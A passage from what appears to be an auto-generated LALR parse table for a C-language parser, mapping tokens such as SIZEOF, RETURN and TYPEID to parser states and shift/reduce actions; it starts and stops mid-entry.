186,187,188,189,190,191,192,198,200,211,214,223,229,231,233,239,240,241,267,269,275,278,279,280,284,285,286,289,291,298,300,301,302,303,305,308,312,313,314,315,316,317,318,328,332,340,341,342,350,422,424,425,427,428,432,435,437,438,439,442,443,446,448,449,453,454,460,496,497,500,505,506,510,511,512,536,554,555,557,558,575,576,578,579,],[50,-337,-113,-128,50,-124,-110,-106,-104,-107,-125,-105,-64,-60,-67,-99,-66,-109,50,-120,-115,-65,-102,-126,-131,-108,-238,-111,-122,-63,-129,50,-29,-121,-116,-62,-112,-70,-52,-123,-117,-337,-337,-119,-337,-114,-130,50,-118,-71,-103,-337,-9,-131,-91,-10,-96,-98,50,-131,-95,-101,-97,50,-53,-126,50,-88,50,50,-93,50,-147,-335,-146,50,-167,-166,-182,-100,-126,50,-87,-90,-94,-92,-61,-72,50,-144,-142,50,50,50,-73,50,-89,50,50,50,-149,-159,-160,-156,-336,50,-183,-30,50,50,-74,50,50,50,50,-174,-175,50,-143,-140,50,-141,-145,-76,-79,-82,-75,-77,50,-81,-215,-214,-80,-216,-78,-127,50,-153,50,-151,-148,-157,-168,-69,-36,-35,50,50,50,-234,-233,50,-231,-217,-230,-81,-84,-218,-152,-150,-158,-170,-169,-31,-34,50,-229,-232,-221,-83,-219,-68,-33,-32,-220,-225,-224,-222,-84,-226,-223,-228,-227,]),'MINUSEQUAL':([132,133,134,136,138,139,140,141,143,144,145,148,152,153,154,156,160,161,163,164,166,167,168,169,176,191,224,230,232,234,235,236,237,238,261,263,268,273,310,402,403,404,405,407,411,478,480,482,483,487,547,551,565,],[-317,-321,-318,-303,-324,-330,-313,-319,-301,-274,-314,-327,-325,-304,-322,-302,-315,-289,-328,-316,-329,-320,-276,-323,-312,-336,358,-326,-280,-277,-334,-332,-331,-333,-298,-297,-279,-278,-312,-296,-295,-294,-293,-292,-305,-281,-282,-290,-291,-275,-306,-299,-300,]),'INT_CONST_OCT':([3,39,58,61,76,85,97,103,105,106,116,117,119,124,128,131,135,137,146,149,150,151,165,171,173,174,175,181,191,198,201,204,205,206,218,219,220,227,229,231,233,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,265,266,282,284,285,286,289,290,291,297,298,300,301,302,303,305,307,308,319,329,332,336,338,339,352,353,354,357,358,359,360,361,362,363,364,365,366,367,368,369,373,375,377,412,413,419,421,424,425,427,428,429,430,432,434,435,437,438,439,440,441,447,459,472,475,477,481,484,488,494,496,497,499,500,502,505,506,510,513,514,515,521,522,533,535,536,537,538,539,541,542,543,549,550,553,554,555,557,558,566,569,574,575,576,577,578,579,],[-128,-129,-130,-71,-131,145,-335,-28,-182,-27,145,-337,-87,-72,-337,145,-286,-285,145,145,-283,-287,-288,145,-284,145,145,145,-336,-183,145,145,-28,-337,145,-28,-337,-337,145,145,145,145,145,145,145,145,145,145,145,145,145,145,145,145,145,145,145,145,145,145,145,145,-337,-76,-79,-82,-75,145,-77,145,145,-81,-215,-214,-80,-216,145,-78,145,145,-69,-284,145,145,-284,145,145,-244,-247,-245,-241,-242,-246,-248,145,-250,-251,-243,-249,-12,145,145,-11,145,145,145,145,-234,-233,145,-231,145,145,-217,145,-230,145,-84,-218,145,145,145,-337,-337,-198,145,145,145,-337,-284,-229,-232,145,-221,145,-83,-219,-68,145,-28,-337,145,-11,145,145,-220,145,145,145,-284,145,145,145,-337,145,-225,-224,-222,-84,145,145,145,-226,-223,145,-228,-227,]),'TIMESEQUAL':([132,133,134,136,138,139,140,141,143,144,145,148,152,153,154,156,160,161,163,164,166,167,168,169,176,191,224,230,232,234,235,236,237,238,261,263,268,273,310,402,403,404,405,407,411,478,480,482,483,487,547,551,565,],[-317,-321,-318,-303,-324,-330,-313,-319,-301,-274,-314,-327,-325,-304,-322,-302,-315,-289,-328,-316,-329,-320,-276,-323,-312,-336,367,-326,-280,-277,-334,-332,-331,-333,-298,-297,-279,-278,-312,-296,-295,-294,-293,-292,-305,-281,-282,-290,-291,-275,-306,-299,-300,]),'OR':([132,133,134,136,138,139,140,141,143,144,145,148,152,153,154,156,158,160,161,162,163,164,166,167,168,169,176,191,224,230,232,234,235,236,237,238,261,263,268,273,310,383,384,385,386,387,388,389,390,391,392,393,394,395,396,397,398,400,401,402,403,404,405,407,411,478,480,482,483,487,547,551,565,],[-317,-321,-318,-303,-324,-330,-313,-319,-301,-274,-314,-327,-325,-304,-322,-302,-255,-315,-289,259,-328,-316,-329,-320,-276,-323,-312,-336,-274,-326,-280,-277,-334,-332,-331,-333,-298,-297,-279,-278,-312,-261,259,-262,-260,-264,-268,-263,-259,-266,-271,-257,-256,-265,259,-267,-269,-270,-258,-296,-295,-294,-293,-292,-305,-281,-282,-290,-291,-275,-306,-299,-300,]),'SHORT':([0,1,2,3,4,5,6,7,10,11,12,13,14,16,17,18,19,20,21,22,23,25,26,27,29,30,33,34,36,38,39,40,42,43,44,45,46,47,48,49,50,52,53,54,55,56,58,59,60,61,62,63,64,65,66,67,68,71,75,76,80,81,82,85,86,87,89,90,91,93,94,95,96,97,98,99,100,101,105,109,111,118,119,120,121,122,123,124,129,142,147,172,174,177,180,181,182,184,185,186,187,188,189,190,191,192,198,200,211,214,223,229,231,233,239,240,241,267,269,275,278,279,280,284,285,286,289,291,298,300,301,302,303,305,308,312,313,314,315,316,317,318,328,332,340,341,342,350,422,424,425,427,428,432,435,437,438,439,442,443,446,448,449,453,454,460,496,497,500,505,506,510,511,512,536,554,555,557,558,575,576,578,579,],[2,-337,-113,-128,2,-124,-110,-106,-104,-107,-125,-105,-64,-60,-67,-99,-66,-109,2,-120,-115,-65,-102,-126,-131,-108,-238,-111,-122,-63,-129,2,-29,-121,-116,-62,-112,-70,-52,-123,-117,-337,-337,-119,-337,-114,-130,2,-118,-71,-103,-337,-9,-131,-91,-10,-96,-98,2,-131,-95,-101,-97,2,-53,-126,2,-88,2,2,-93,2,-147,-335,-146,2,-167,-166,-182,-100,-126,2,-87,-90,-94,-92,-61,-72,2,-144,-142,2,2,2,-73,2,-89,2,2,2,-149,-159,-160,-156,-336,2,-183,-30,2,2,-74,2,2,2,2,-174,-175,2,-143,-140,2,-141,-145,-76,-79,-82,-75,-77,2,-81,-215,-214,-80,-216,-78,-127,2,-153,2,-151,-148,-157,-168,-69,-36,-35,2,2,2,-234,-233,2,-231,-217,-230,-81,-84,-218,-152,-150,-158,-170,-169,-31,-34,2,-229,-232,-221,-83,-219,-68,-33,-32,-220,-225,-224,-222,-84,-226,-223,-228,-227,]),'RETURN':([61,97,119,124,181,191,284,285,286,289,291,298,300,301,302,303,305,307,308,332,424,425,428,429,432,435,437,438,439,440,496,497,500,502,505,506,510,535,536,537,539,554,555,557,558,569,574,575,576,577,578,579,],[-71,-335,-87,-72,290,-336,-76,-79,-82,-75,-77,290,-81,-215,-214,-80,-216,290,-78,-69,-234,-233,-231,290,-217,-230,290,-84,-218,290,-229,-232,-221,290,-83,-219,-68,290,-220,290,290,-225,-224,-222,-84,290,290,-226,-223,290,-228,-227,]),'RSHIFTEQUAL':([132,133,134,136,138,139,140,141,143,144,145,148,152,153,154,156,160,161,163,164,166,167,168,169,176,191,224,230,232,234,235,236,237,238,261,263,268,273,310,402,403,404,405,407,411,478,480,482,483,487,547,551,565,],[-317,-321,-318,-303,-324,-330,-313,-319,-301,-274,-314,-327,-325,-304,-322,-302,-315,-289,-328,-316,-329,-320,-276,-323,-312,-336,368,-326,-280,-277,-334,-332,-331,-333,-298,-297,-279,-278,-312,-296,-295,-294,-293,-292,-305,-281,-282,-290,-291,-275,-306,-299,-300,]),'_ALIGNAS':([0,1,2,3,4,5,6,7,10,11,12,13,14,16,17,18,19,20,21,22,23,25,26,27,29,30,33,34,36,38,39,42,43,44,45,46,47,48,49,50,52,53,54,55,56,58,59,60,61,62,63,65,68,71,75,76,80,81,82,85,86,87,89,90,93,95,96,97,98,99,100,101,109,111,118,119,123,124,129,142,147,174,177,180,181,182,184,185,186,187,188,189,190,191,192,200,211,223,229,231,233,239,240,241,267,269,275,278,279,280,284,285,286,289,291,298,300,301,302,303,305,308,312,313,314,315,316,317,318,328,332,340,341,342,350,422,424,425,427,428,432,435,437,438,439,442,443,446,448,449,453,454,460,496,497,500,505,506,510,511,512,536,554,555,557,558,575,576,578,579,],[8,8,-113,-128,8,-124,-110,-106,-104,-107,-125,-105,-64,-60,-67,-99,-66,-109,8,-120,-115,-65,-102,8,-131,-108,-238,-111,-122,-63,-129,-29,-121,-116,-62,-112,-70,-52,-123,-117,8,8,-119,8,-114,-130,8,-118,-71,-103,8,-131,-96,-98,8,-131,-95,-101,-97,8,-53,8,8,-88,8,8,-147,-335,-146,8,-167,-166,-100,-126,8,-87,-61,-72,8,-144,-142,8,8,-73,8,-89,8,8,8,-149,-159,-160,-156,-336,8,-30,8,-74,8,8,8,8,-174,-175,8,-143,-140,8,-141,-145,-76,-79,-82,-75,-77,8,-81,-215,-214,-80,-216,-78,-127,8,-153,8,-151,-148,-157,-168,-69,-36,-35,8,8,8,-234,-233,8,-231,-217,-230,-81,-84,-218,-152,-150,-158,-170,-169,-31,-34,8,-229,-232,-221,-83,-219,-68,-33,-32,-220,-225,-224,-222,-84,-226,-223,-228,-227,]),'RESTRICT':([0,1,2,3,4,5,6,7,10,11,12,13,14,16,17,18,19,20,21,22,23,25,26,27,29,30,33,34,35,36,38,39,42,43,44,45,46,47,48,49,50,52,53,54,55,56,58,59,60,61,62,63,65,68,71,75,76,80,81,82,85,86,87,89,90,93,95,96,97,98,99,100,101,103,105,109,111,117,118,119,123,124,128,129,142,147,172,174,177,180,181,182,184,185,186,187,188,189,190,191,192,198,200,205,206,211,219,220,223,229,231,233,239,240,241,267,269,275,278,279,280,282,284,285,286,289,291,298,300,301,302,303,305,308,312,313,314,315,316,317,318,328,332,340,341,342,350,422,424,425,427,428,432,435,437,438,439,442,443,446,448,449,453,454,459,460,496,497,500,505,506,510,511,512,514,515,536,554,555,557,558,575,576,578,579,],[39,39,-113,-128,39,-124,-110,-106,-104,-107,-125,-105,-64,-60,-67,-99,-66,-109,39,-120,-115,-65,-102,39,-131,-108,-238,-111,39,-122,-63,-129,-29,-121,-116,-62,-112,-70,-52,-123,-117,39,39,-119,39,-114,-130,39,-118,-71,-103,39,-131,-96,-98,39,-131,-95,-101,-97,39,-53,39,39,-88,39,39,-147,-335,-146,39,-167,-166,39,-182,-100,-126,39,39,-87,-61,-72,39,39,-144,-142,39,39,39,-73,39,-89,39,39,39,-149,-159,-160,-156,-336,39,-183,-30,39,39,39,39,39,-74,39,39,39,39,-174,-175,39,-143,-140,39,-141,-145,39,-76,-79,-82,-75,-77,39,-81,-215,-214,-80,-216,-78,-127,39,-153,39,-151,-148,-157,-168,-69,-36,-35,39,39,39,-234,-233,39,-231,-217,-230,-81,-84,-218,-152,-150,-158,-170,-169,-31,-34,39,39,-229,-232,-221,-83,-219,-68,-33,-32,39,39,-220,-225,-224,-222,-84,-226,-223,-228,-227,]),'STATIC':([0,1,2,3,4,5,6,7,10,11,12,13,14,16,17,18,19,20,21,22,23,25,26,27,29,30,33,34,36,38,39,42,43,44,45,46,47,48,49,50,52,53,54,55,56,58,59,60,61,62,63,65,68,71,75,76,80,81,82,86,87,89,90,93,96,97,98,100,101,105,109,111,117,118,119,123,124,128,129,180,181,182,187,191,198,200,205,211,219,223,240,241,278,284,285,286,289,291,298,300,301,302,303,305,308,312,314,316,317,328,332,340,341,342,350,422,424,425,427,428,432,435,437,438,439,442,443,448,449,453,454,459,460,496,497,500,505,506,510,511,512,514,536,554,555,557,558,575,576,578,579,],[10,10,-113,-128,10,-124,-110,-106,-104,-107,-125,-105,-64,-60,-67,-99,-66,-109,10,-120,-115,-65,-102,10,-131,-108,-238,-111,-122,-63,-129,-29,-121,-116,-62,-112,-70,-52,-123,-117,10,10,-119,10,-114,-130,10,-118,-71,-103,10,-131,-96,-98,10,-131,-95,-101,-97,-53,10,10,-88,10,-147,-335,-146,-167,-166,-182,-100,-126,206,10,-87,-61,-72,220,10,-73,10,-89,-149,-336,-183,-30,338,10,353,-74,-174,-175,10,-76,-79,-82,-75,-77,10,-81,-215,-214,-80,-216,-78,-127,-153,-151,-148,-168,-69,-36,-35,10,10,10,-234,-233,10,-231,-217,-230,-81,-84,-218,-152,-150,-170,-169,-31,-34,515,10,-229,-232,-221,-83,-219,-68,-33,-32,542,-220,-225,-224,-222,-84,-226,-223,-228,-227,]),'SIZEOF':([3,39,58,61,76,85,97,103,105,106,116,117,119,124,128,131,135,137,146,149,150,151,165,171,173,174,175,181,191,198,201,204,205,206,218,219,220,227,229,231,233,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,265,266,282,284,285,286,289,290,291,297,298,300,301,302,303,305,307,308,319,329,332,336,338,339,352,353,354,357,358,359,360,361,362,363,364,365,366,367,368,369,373,375,377,412,413,419,421,424,425,427,428,429,430,432,434,435,437,438,439,440,441,447,459,472,475,477,481,484,488,494,496,497,499,500,502,505,506,510,513,514,515,521,522,533,535,536,537,538,539,541,542,543,549,550,553,554,555,557,558,566,569,574,575,576,577,578,579,],[-128,-129,-130,-71,-131,146,-335,-28,-182,-27,146,-337,-87,-72,-337,146,-286,-285,146,146,-283,-287,-288,146,-284,146,146,146,-336,-183,146,146,-28,-337,146,-28,-337,-337,146,146,146,146,146,146,146,146,146,146,146,146,146,146,146,146,146,146,146,146,146,146,146,146,-337,-76,-79,-82,-75,146,-77,146,146,-81,-215,-214,-80,-216,146,-78,146,146,-69,-284,146,146,-284,146,146,-244,-247,-245,-241,-242,-246,-248,146,-250,-251,-243,-249,-12,146,146,-11,146,146,146,146,-234,-233,146,-231,146,146,-217,146,-230,146,-84,-218,146,146,146,-337,-337,-198,146,146,146,-337,-284,-229,-232,146,-221,146,-83,-219,-68,146,-28,-337,146,-11,146,146,-220,146,146,146,-284,146,146,146,-337,146,-225,-224,-222,-84,146,146,146,-226,-223,146,-228,-227,]),'UNSIGNED':([0,1,2,3,4,5,6,7,10,11,12,13,14,16,17,18,19,20,21,22,23,25,26,27,29,30,33,34,36,38,39,40,42,43,44,45,46,47,48,49,50,52,53,54,55,56,58,59,60,61,62,63,64,65,66,67,68,71,75,76,80,81,82,85,86,87,89,90,91,93,94,95,96,97,98,99,100,101,105,109,111,118,119,120,121,122,123,124,129,142,147,172,174,177,180,181,182,184,185,186,187,188,189,190,191,192,198,200,211,214,223,229,231,233,239,240,241,267,269,275,278,279,280,284,285,286,289,291,298,300,301,302,303,305,308,312,313,314,315,316,317,318,328,332,340,341,342,350,422,424,425,427,428,432,435,437,438,439,442,443,446,448,449,453,454,460,496,497,500,505,506,510,511,512,536,554,555,557,558,575,576,578,579,],[22,-337,-113,-128,22,-124,-110,-106,-104,-107,-125,-105,-64,-60,-67,-99,-66,-109,22,-120,-115,-65,-102,-126,-131,-108,-238,-111,-122,-63,-129,22,-29,-121,-116,-62,-112,-70,-52,-123,-117,-337,-337,-119,-337,-114,-130,22,-118,-71,-103,-337,-9,-131,-91,-10,-96,-98,22,-131,-95,-101,-97,22,-53,-126,22,-88,22,22,-93,22,-147,-335,-146,22,-167,-166,-182,-100,-126,22,-87,-90,-94,-92,-61,-72,22,-144,-142,22,22,22,-73,22,-89,22,22,22,-149,-159,-160,-156,-336,22,-183,-30,22,22,-74,22,22,22,22,-174,-175,22,-143,-140,22,-141,-145,-76,-79,-82,-75,-77,22,-81,-215,-214,-80,-216,-78,-127,22,-153,22,-151,-148,-157,-168,-69,-36,-35,22,22,22,-234,-233,22,-231,-217,-230,-81,-84,-218,-152,-150,-158,-170,-169,-31,-34,22,-229,-232,-221,-83,-219,-68,-33,-32,-220,-225,-224,-222,-84,-226,-223,-228,-227,]),'UNION':([0,1,3,7,10,11,13,14,16,17,19,20,21,25,26,27,29,30,38,39,40,42,45,47,48,52,53,55,58,59,61,62,63,64,65,66,67,75,85,86,87,90,91,93,94,95,97,99,105,118,119,120,121,122,123,124,129,172,174,180,181,182,184,185,186,188,189,190,191,198,200,214,223,229,231,233,239,240,241,267,278,284,285,286,289,291,298,300,301,302,303,305,308,312,313,315,318,332,340,341,342,350,422,424,425,427,428,432,435,437,438,439,446,453,454,460,496,497,500,505,506,510,511,512,536,554,555,557,558,575,576,578,579,],[28,-337,-128,-106,-104,-107,-105,-64,-60,-67,-66,-109,28,-65,-102,-337,-131,-108,-63,-129,28,-29,-62,-70,-52,-337,-337,-337,-130,28,-71,-103,-337,-9,-131,-91,-10,28,28,-53,-337,-88,28,28,-93,28,-335,28,-182,28,-87,-90,-94,-92,-61,-72,28,28,28,-73,28,-89,28,28,28,-159,-160,-156,-336,-183,-30,28,-74,28,28,28,28,-174,-175,28,28,-76,-79,-82,-75,-77,28,-81,-215,-214,-80,-216,-78,-127,28,28,-157,-69,-36,-35,28,28,28,-234,-233,28,-231,-217,-230,-81,-84,-218,-158,-31,-34,28,-229,-232,-221,-83,-219,-68,-33,-32,-220,-225,-224,-222,-84,-226,-223,-228,-227,]),'COLON':([2,3,5,6,12,22,23,33,34,36,39,42,43,44,46,48,49,50,54,56,58,60,73,74,76,77,86,96,98,100,101,111,127,132,133,134,136,138,139,140,141,142,143,144,145,147,148,152,153,154,156,158,160,161,162,163,164,166,167,168,169,176,178,179,187,191,192,200,216,224,225,230,232,234,235,236,237,238,240,241,261,263,268,269,272,273,275,279,280,295,310,312,314,316,317,324,328,340,341,355,356,383,384,385,386,387,388,389,390,391,392,393,394,395,396,397,398,399,400,401,402,403,404,405,407,411,431,442,443,445,448,449,453,454,464,465,468,476,478,480,482,483,486,487,511,512,518,519,524,547,551,565,],[-113,-128,-124,-110,-125,-120,-115,-238,-111,-122,-129,-29,-121,-116,-112,-52,-123,-117,-119,-114,-130,-118,-54,-179,-131,-37,-53,-147,-146,-167,-166,-126,-55,-317,-321,-318,-303,-324,-330,-313,-319,-144,-301,-274,-314,-142,-327,-325,-304,-322,-302,-255,-315,-289,-253,-328,-316,-329,-320,-276,-323,-312,-252,-178,-149,-336,319,-30,-38,-274,-239,-326,-280,-277,-334,-332,-331,-333,-174,-175,-298,-297,-279,-143,-235,-278,-140,-141,-145,429,440,-127,-153,-151,-148,447,-168,-36,-35,-44,-43,-261,-273,-262,-260,-264,-268,-263,-259,-266,-271,-257,-256,-265,-272,-267,-269,481,-270,-258,-296,-295,-294,-293,-292,-305,502,-152,-150,319,-170,-169,-31,-34,-39,-42,-240,-237,-281,-282,-290,-291,-236,-275,-33,-32,-41,-40,-254,-306,-299,-300,]),'$end':([0,9,14,16,17,19,25,38,45,47,57,59,61,119,123,124,180,191,223,332,439,510,],[-337,0,-64,-60,-67,-66,-65,-63,-62,-70,-59,-58,-71,-87,-61,-72,-73,-336,-74,-69,-218,-68,]),'WSTRING_LITERAL':([3,39,58,61,76,85,97,103,105,106,116,117,119,124,128,131,135,137,139,146,148,149,150,151,153,163,165,166,171,173,174,175,181,191,198,201,204,205,206,218,219,220,227,229,231,233,235,236,237,238,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,265,266,282,284,285,286,289,290,291,297,298,300,301,302,303,305,307,308,319,329,332,336,338,339,352,353,354,357,358,359,360,361,362,363,364,365,366,367,368,369,373,375,377,412,413,419,421,424,425,427,428,429,430,432,434,435,437,438,439,440,441,447,459,472,475,477,481,484,488,494,496,497,499,500,502,505,506,510,513,514,515,521,522,533,535,536,537,538,539,541,542,543,549,550,553,554,555,557,558,566,569,574,575,576,577,578,579,],[-128,-129,-130,-71,-131,148,-335,-28,-182,-27,148,-337,-87,-72,-337,148,-286,-285,-330,148,-327,148,-283,-287,237,-328,-288,-329,148,-284,148,148,148,-336,-183,148,148,-28,-337,148,-28,-337,-337,148,148,148,-334,-332,-331,-333,148,148,148,148,148,148,148,148,148,148,148,148,148,148,148,148,148,148,148,148,148,-337,-76,-79,-82,-75,148,-77,148,148,-81,-215,-214,-80,-216,148,-78,148,148,-69,-284,148,148,-284,148,148,-244,-247,-245,-241,-242,-246,-248,148,-250,-251,-243,-249,-12,148,148,-11,148,148,148,148,-234,-233,148,-231,148,148,-217,148,-230,148,-84,-218,148,148,148,-337,-337,-198,148,148,148,-337,-284,-229,-232,148,-221,148,-83,-219,-68,148,-28,-337,148,-11,148,148,-220,148,148,148,-284,148,148,148,-337,148,-225,-224,-222,-84,148,148,148,-226,-223,148,-228,-227,]),'DIVIDE':([132,133,134,136,138,139,140,141,143,144,145,148,152,153,154,156,158,160,161,162,163,164,166,167,168,169,176,191,224,230,232,234,235,236,237,238,261,263,268,273,310,383,384,385,386,387,388,389,390,391,392,393,394,395,396,397,398,400,401,402,403,404,405,407,411,478,480,482,483,487,547,551,565,],[-317,-321,-318,-303,-324,-330,-313,-319,-301,-274,-314,-327,-325,-304,-322,-302,-255,-315,-289,252,-328,-316,-329,-320,-276,-323,-312,-336,-274,-326,-280,-277,-334,-332,-331,-333,-298,-297,-279,-278,-312,252,252,252,252,252,252,252,252,252,252,-257,-256,252,252,252,252,252,-258,-296,-295,-294,-293,-292,-305,-281,-282,-290,-291,-275,-306,-299,-300,]),'FOR':([61,97,119,124,181,191,284,285,286,289,291,298,300,301,302,303,305,307,308,332,424,425,428,429,432,435,437,438,439,440,496,497,500,502,505,506,510,535,536,537,539,554,555,557,558,569,574,575,576,577,578,579,],[-71,-335,-87,-72,292,-336,-76,-79,-82,-75,-77,292,-81,-215,-214,-80,-216,292,-78,-69,-234,-233,-231,292,-217,-230,292,-84,-218,292,-229,-232,-221,292,-83,-219,-68,292,-220,292,292,-225,-224,-222,-84,292,292,-226,-223,292,-228,-227,]),'PLUSPLUS':([3,39,58,61,76,85,97,103,105,106,116,117,119,124,128,131,132,133,134,135,136,137,138,139,140,141,143,145,146,148,149,150,151,152,153,154,156,160,161,163,164,165,166,167,168,169,171,173,174,175,176,181,191,198,201,204,205,206,218,219,220,227,229,230,231,233,235,236,237,238,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,261,263,265,266,282,284,285,286,289,290,291,297,298,300,301,302,303,305,307,308,310,319,329,332,336,338,339,352,353,354,357,358,359,360,361,362,363,364,365,366,367,368,369,373,375,377,402,403,404,405,407,411,412,413,419,421,424,425,427,428,429,430,432,434,435,437,438,439,440,441,447,459,472,475,477,481,482,483,484,488,494,496,497,499,500,502,505,506,510,513,514,515,521,522,533,535,536,537,538,539,541,542,543,547,549,550,551,553,554,555,557,558,565,566,569,574,575,576,577,578,579,],[-128,-129,-130,-71,-131,149,-335,-28,-182,-27,149,-337,-87,-72,-337,149,-317,-321,-318,-286,-303,-285,-324,-330,-313,-319,-301,-314,149,-327,149,-283,-287,-325,-304,-322,-302,-315,-289,-328,-316,-288,-329,-320,263,-323,149,-284,149,149,-312,149,-336,-183,149,149,-28,-337,149,-28,-337,-337,149,-326,149,149,-334,-332,-331,-333,149,149,149,149,149,149,149,149,149,149,149,149,149,149,149,149,149,149,149,-298,-297,149,149,-337,-76,-79,-82,-75,149,-77,149,149,-81,-215,-214,-80,-216,149,-78,-312,149,149,-69,-284,149,149,-284,149,149,-244,-247,-245,-241,-242,-246,-248,149,-250,-251,-243,-249,-12,149,149,-11,-296,-295,-294,-293,-292,-305,149,149,149,149,-234,-233,149,-231,149,149,-217,149,-230,149,-84,-218,149,149,149,-337,-337,-198,149,149,-290,-291,149,-337,-284,-229,-232,149,-221,149,-83,-219,-68,149,-28,-337,149,-11,149,149,-220,149,149,149,-284,149,149,-306,149,-337,-299,149,-225,-224,-222,-84,-300,149,149,149,-226,-223,149,-228,-227,]),'EQUALS':([42,48,73,74,75,77,78,86,110,127,132,133,134,136,138,139,140,141,143,144,145,148,152,153,154,156,160,161,163,164,166,167,168,169,176,179,191,197,200,216,224,230,232,234,235,236,237,238,261,263,268,273,310,340,341,355,356,371,376,402,403,404,405,407,411,453,454,464,465,470,474,478,480,482,483,487,511,512,518,519,520,547,551,565,],[-29,-52,-54,-179,-178,-37,131,-53,201,-55,-317,-321,-318,-303,-324,-330,-313,-319,-301,-274,-314,-327,-325,-304,-322,-302,-315,-289,-328,-316,-329,-320,-276,-323,-312,-178,-336,329,-30,-38,360,-326,-280,-277,-334,-332,-331,-333,-298,-297,-279,-278,-312,-36,-35,-44,-43,-199,475,-296,-295,-294,-293,-292,-305,-31,-34,-39,-42,-202,-200,-281,-282,-290,-291,-275,-33,-32,-41,-40,-201,-306,-299,-300,]),'ELSE':([61,124,191,284,285,286,289,291,300,303,308,332,424,425,428,435,437,438,439,496,497,500,505,506,510,536,554,555,557,558,575,576,578,579,],[-71,-72,-336,-76,-79,-82,-75,-77,-81,-80,-78,-69,-234,-233,-231,-230,-81,-84,-218,-229,-232,-221,-83,-219,-68,-220,-225,-224,-222,569,-226,-223,-228,-227,]),'ANDEQUAL':([132,133,134,136,138,139,140,141,143,144,145,148,152,153,154,156,160,161,163,164,166,167,168,169,176,191,224,230,232,234,235,236,237,238,261,263,268,273,310,402,403,404,405,407,411,478,480,482,483,487,547,551,565,],[-317,-321,-318,-303,-324,-330,-313,-319,-301,-274,-314,-327,-325,-304,-322,-302,-315,-289,-328,-316,-329,-320,-276,-323,-312,-336,365,-326,-280,-277,-334,-332,-331,-333,-298,-297,-279,-278,-312,-296,-295,-294,-293,-292,-305,-281,-282,-290,-291,-275,-306,-299,-300,]),'EQ':([132,133,134,136,138,139,140,141,143,144,145,148,152,153,154,156,158,160,161,162,163,164,166,167,168,169,176,191,224,230,232,234,235,236,237,238,261,263,268,273,310,383,384,385,386,387,388,389,390,391,392,393,394,395,396,397,398,400,401,402,403,404,405,407,411,478,480,482,483,487,547,551,565,],[-317,-321,-318,-303,-324,-330,-313,-319,-301,-274,-314,-327,-325,-304,-322,-302,-255,-315,-289,256,-328,-316,-329,-320,-276,-323,-312,-336,-274,-326,-280,-277,-334,-332,-331,-333,-298,-297,-279,-278,-312,-261,256,-262,-260,-264,-268,-263,-259,-266,256,-257,-256,-265,256,-267,256,256,-258,-296,-295,-294,-293,-292,-305,-281,-282,-290,-291,-275,-306,-299,-300,]),'AND':([3,39,58,61,76,85,97,103,105,106,116,117,119,124,128,131,132,133,134,135,136,137,138,139,140,141,143,144,145,146,148,149,150,151,152,153,154,156,158,160,161,162,163,164,165,166,167,168,169,171,173,174,175,176,181,191,198,201,204,205,206,218,219,220,224,227,229,230,231,232,233,234,235,236,237,238,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,261,263,265,266,268,273,282,284,285,286,289,290,291,297,298,300,301,302,303,305,307,308,310,319,329,332,336,338,339,352,353,354,357,358,359,360,361,362,363,364,365,366,367,368,369,373,375,377,383,384,385,386,387,388,389,390,391,392,393,394,395,396,397,398,400,401,402,403,404,405,407,411,412,413,419,421,424,425,427,428,429,430,432,434,435,437,438,439,440,441,447,459,472,475,477,478,480,481,482,483,484,487,488,494,496,497,499,500,502,505,506,510,513,514,515,521,522,533,535,536,537,538,539,541,542,543,547,549,550,551,553,554,555,557,558,565,566,569,574,575,576,577,578,579,],[-128,-129,-130,-71,-131,150,-335,-28,-182,-27,150,-337,-87,-72,-337,150,-317,-321,-318,-286,-303,-285,-324,-330,-313,-319,-301,-274,-314,150,-327,150,-283,-287,-325,-304,-322,-302,-255,-315,-289,257,-328,-316,-288,-329,-320,-276,-323,150,-284,150,150,-312,150,-336,-183,150,150,-28,-337,150,-28,-337,-274,-337,150,-326,150,-280,150,-277,-334,-332,-331,-333,150,150,150,150,150,150,150,150,150,150,150,150,150,150,150,150,150,150,150,-298,-297,150,150,-279,-278,-337,-76,-79,-82,-75,150,-77,150,150,-81,-215,-214,-80,-216,150,-78,-312,150,150,-69,-284,150,150,-284,150,150,-244,-247,-245,-241,-242,-246,-248,150,-250,-251,-243,-249,-12,150,150,-11,-261,257,-262,-260,-264,-268,-263,-259,-266,257,-257,-256,-265,257,-267,-269,257,-258,-296,-295,-294,-293,-292,-305,150,150,150,150,-234,-233,150,-231,150,150,-217,150,-230,150,-84,-218,150,150,150,-337,-337,-198,150,-281,-282,150,-290,-291,150,-275,-337,-284,-229,-232,150,-221,150,-83,-219,-68,150,-28,-337,150,-11,150,150,-220,150,150,150,-284,150,150,-306,150,-337,-299,150,-225,-224,-222,-84,-300,150,150,150,-226,-223,150,-228,-227,]),'TYPEID':([0,1,2,3,4,5,6,7,10,11,12,13,14,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,38,39,40,42,43,44,45,46,47,48,49,50,52,53,54,55,56,58,59,60,61,62,63,64,65,66,67,68,69,71,72,75,76,80,81,82,85,86,87,89,90,91,93,94,95,96,97,98,99,100,101,103,104,105,106,109,111,118,119,120,121,122,123,124,126,129,142,147,172,174,180,181,182,184,185,186,187,188,189,190,191,192,198,199,200,202,211,214,223,229,231,233,239,240,241,262,264,267,269,275,278,279,280,284,285,286,289,291,298,300,301,302,303,305,308,312,313,314,315,316,317,318,328,332,340,341,342,344,350,422,424,425,427,428,432,435,437,438,439,442,443,445,446,448,449,453,454,460,496,497,500,505,506,510,511,512,536,554,555,557,558,575,576,578,579,],[33,-337,-113,-128,77,-124,-110,-106,-104,-107,-125,-105,-64,-60,-67,-99,-66,-109,33,-120,-115,-154,-65,-102,-126,-155,-131,-108,96,100,-238,-111,-337,-122,-63,-129,33,-29,-121,-116,-62,-112,-70,-52,-123,-117,-337,-337,-119,-337,-114,-130,33,-118,-71,-103,-337,-9,-131,-91,-10,-96,77,-98,77,33,-131,-95,-101,-97,33,-53,-126,77,-88,33,33,-93,33,-147,-335,-146,33,-167,-166,-28,-180,-182,-27,-100,-126,33,-87,-90,-94,-92,-61,-72,77,33,-144,-142,33,33,-73,33,-89,33,33,33,-149,-159,-160,-156,-336,77,-183,-181,-30,77,347,33,-74,33,33,33,33,-174,-175,402,404,33,-143,-